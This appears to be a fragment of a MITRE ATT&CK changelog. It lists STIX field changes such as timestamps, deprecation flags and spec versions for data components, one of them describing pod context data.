| x_mitre_deprecated | True | |
| x_mitre_attack_spec_version | 2.1.0 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274884Z | 2022-11-07T19:45:00.000Z |
| created | 2021-10-20T15:05:19.274884Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a pod and activity around it such as name, ID, namespace, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_deprecated | True | |
| x_mitre_attack_spec_version | 2.1.0 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272873Z | 2022-11-07T19:45:00.000Z |
| created | 2021-10-20T15:05:19.272873Z | 2021-10-20T15:05:19.272Z |